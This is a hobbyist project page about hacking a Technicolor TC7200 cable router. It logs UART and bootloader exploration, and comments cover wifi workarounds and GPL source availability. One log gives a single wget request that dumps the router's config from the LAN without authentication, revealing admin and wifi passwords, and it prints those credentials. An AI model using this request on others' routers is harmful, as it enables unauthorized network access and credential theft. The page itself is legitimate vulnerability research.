Close
0%
0%

technicolor tc7200 cable "modem"

Similar projects worth following
The lowest-end cable modem available for UPC, KabelDeutschland and other cable internet provides is the Technicolor TC7200. It is marketed as "modem", but in fact it is a router.
The firmware is branded/limited, buggy and "ugly" (e.g. complete web interface live-translates via javascript, non-working options like bridge-mode and wifi). As the device runs linux and provides different interfaces (including cable), it would be nice to get into the system and play with it. I will use a unit off ebay, as the units provided by the cable company are still owned by them (and I dont want to jam the interwebs).

[!!!] FOR CHANGES/MODS/HACKS ON THE DEVICE I USE A UNIT OFF EBAY WHICH I (not a KabelBW customer!) NEVER CONNECT TO THE CABLE NETWORK FOR THIS EXPERIMENTS [!!!]

The Technicolor tc7200 runs linux. Neither Technicolor nor the cable provider (KabelBW) provides the sources for the GPL licenced code. Technicolor does not answer end-customer questions, KabelBW does not answer questions without a customer number (which I will not provide because it is not relevant for the request).

On top of that, the device is unstable and insecure (e.g. get admin password or do factory reset from LAN side with a single http requst) - yay! It is not possible to configure wireless (config page just shows up a error message), but wireless is still enabled.

To secure devices and network I had to add a second openwrt box and DMZ it (at least this works...).

  • uart commandline

    rawe01/21/2015 at 22:20 0 comments

    finally I've got a unit the cable provider does not want back, so it is time to open it up and check for the two UART interfaces.. One UART interface provides bootloader access, the other one linux /dev/ttyS0. There is one SPI flash of 1megabyte, one parallel nand flash chip and one DDR ram chip.

    <insert pic here>

    the linux login does not work (admin/admin), as the session terminates immediately after login.

    It is not possible to dump the flash content by the bootloader as the memory dump function only handles addresses 0x80000000 and up. Fortunately the boot images seem to get loaded into this address space during bootup which may make the system cold-boot-attackable. E.g. power up the device, reset it and then dump the RAM contents. As this takes ages to dump megabytes of data over uart, here is just the stirngs command on the first few dumped kilobytes after 0x80000000 to prove that it is at least possible to get some useful data out of this:

    !@        
     @T@
    b4BM
    Bldr
    2.4.0alpha18p1
    Bldr
    LVGbootloader
    image1
    image2
    linux
    linuxapps
    permnv
    dhtml
    dynnv
    linuxkfs
    ...
    

    (these strings are used by the bootloader for the flash partition overview table printed on startup).

    Next steps are to check the available address space (too high addresses crash the unit). If it is possible to address 128megabytes after 0x80000000 the real physical memory is mapped to these addresses.

    from linux bootlog:

    [ 21.310000] Serial: BCM63XX driver $Revision: 1.4 $

  • dump admin and wifi password from LAN

    rawe11/25/2014 at 20:11 0 comments

    just do a

    wget -q -O - http://192.168.0.1/goform/system/GatewaySettings.bin | strings

    and receive

    8021
    !UPC1386571
        *    +
        SKKMRPXP
        27354285
        Broadcom
        Broadcom
    TechnicolorAP
    123456
    #0x000102030405060708090A0B0C0D0EBB
    0000001
    CDP.
    RG..
    admin
    Technicolor
    clock.via.net
    ntp.nasa.gov
    tick.ucla.edu
    FIRE
    T802
    UPC1386571
    2.4G
    UPC0118016
        SKKMRPXP
        EZXRXZZE
    THOMSON
    THOMSON
        SKKMRPXP
    THOMSON
    THOMSON
    THOMSON
    UPC.
    <Admin
    MLog
    admin
    admin
    

    The last two lines are the admin login (user admin, password admin). I leave them set to their default config, because it does not increase security to change them...

    The wireless name is UPC1386571 and the password SKKMRPXP:

    Cell 08 - Address: 8C:04:FF:*:*:*
        Channel:11
        Frequency:2.462 GHz (Channel 11)
        Quality=54/70  Signal level=-56 dBm  
        Encryption key:on
        ESSID:"UPC1386571"
        Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
          24 Mb/s; 36 Mb/s; 54 Mb/s
        Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s
        Mode:Master
        Extra:tsf=00000008198c21d5
        Extra: Last beacon: 220ms ago
        IE: IEEE 802.11i/WPA2 Version 1
            Group Cipher : TKIP
            Pairwise Ciphers (2) : CCMP TKIP
            Authentication Suites (1) : PSK
        IE: WPA Version 1
            Group Cipher : TKIP
            Pairwise Ciphers (2) : CCMP TKIP
            Authentication Suites (1) : PSK

    There is no way to disable wireless (or edit the password) because I am greeted with the error message

    The connection to the server was reset while the page was loading.

    if I try to access the "Wireless" settings tab in the web UI. It is not possible to edit the dumped config file and write it back, because this is broken in current software.

    De facto, anyone who figures out the algorithm that calcs the wifi password based on... well most propably just the MAC address or something other visible from the outside... can access my wireless network which I never activated (btw. internet was ordered WITHOUT wifi, because they want extra money for it!). If the wifi password is truely "random", the password is still only 8 digits only uppercase letters from which only E S P K M R X Z were observed so far (only 8!).

    It is time to wrap that device in aluminium foil...

    Edit: told you so... http://derstandard.at/2000028921659/UPC-Standard-WLAN-Passwoerter-kinderleicht-zu-knacken

    I am sure TechnicolorAP / 123456 and the other strange strings are other login credentials, maybe used for telnet (did not try this on the internet connected/KabelBW provided unit):

    Trying 192.168.100.1...
    Connected to 192.168.100.1.
    Escape character is '^]'
    
    Broadcom Corporation Embedded BFC Telnet Server (c) 2000-2008
    
    WARNING: Access allowed by authorized users only.
    
    Login:

    other source for CSRF Vulnerabilities: https://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/

View all 2 project logs

Enjoy this project?

Share

Discussions

esot.eric wrote 01/13/2015 at 13:09 point

Is it part of the 1337 haxor's mentality to make a description that's only relevent to those "in the know" or...? Seriously.

  Are you sure? yes | no

rawe wrote 01/21/2015 at 21:01 point

description was replaced with one that should be clearer, just ask if there are additional Qs.

  Are you sure? yes | no

esot.eric wrote 01/21/2015 at 22:11 point

Ah, cool, thanks.

  Are you sure? yes | no

basto wrote 01/10/2015 at 16:41 point

"if I try to access the "Wireless" settings tab in the web UI. It is not
possible to edit the dumped config file and write it back, because this
is broken in current software"

I ran into the same problem - there is a trick to fix it:

1. Remove the power AND the coax from the modem
2. Do a factory reset (Plug power, and push 40 seconds the reset button)
3. Login and click wireless, disable wireless, save
4. Replug everything like it was, power cycle.

Here's the German reference:

http://www.unitymediakabelbwforum.de/viewtopic.php?f=77&t=29281&start=30#p306077

Apart from that: What you said about the sources being unavailable to endusers is very interesting. If Technicolor really refused to give you the source this is a clear GPL violation and you should point it out to the FSF .

https://www.gnu.org/licenses/gpl-violation.html

They already acted in case of AVM:

https://fsfe.org/news/2011/news-20110620-01.en.html

Edit: Oh, another thing.

Also my wireless keys contain 8 letters, but I think the full alphabet is used for the random generation.

Additionally to yours above, mine contain:

A,B,C,F,G,H,N,T,Q (taken both from 2.4 and 5 Ghz SSIDs)

  Are you sure? yes | no

rawe wrote 01/13/2015 at 12:31 point

Thanks for the wifi hints :) I still need to verify that GPL code runs on the device myself... I have no time to look into the GPL thing in detail, but here is a starting point if somebody wants to:

  Are you sure? yes | no

basto wrote 01/14/2015 at 12:32 point

You don't need to verify GPL software anymore.

Look here:

http://www.boards.ie/vbulletin/showthread.php?s=70037423285b05c4bc6b39549dbc4cf9&t=2057147563

The serial console reads:

"""

(... lots of stuff...)

Booting Linux...

(...lots of stuff...)

"""

I also read that BusyBox (also GPL) is installed, but I don't find the reference anymore.

  Are you sure? yes | no

rawe wrote 01/14/2015 at 13:12 point
as seen on https://news.ycombinator.com/item?id=7584466 ;)

  Are you sure? yes | no

Similar Projects

Does this project spark your interest?

Become a member to follow this project and never miss any updates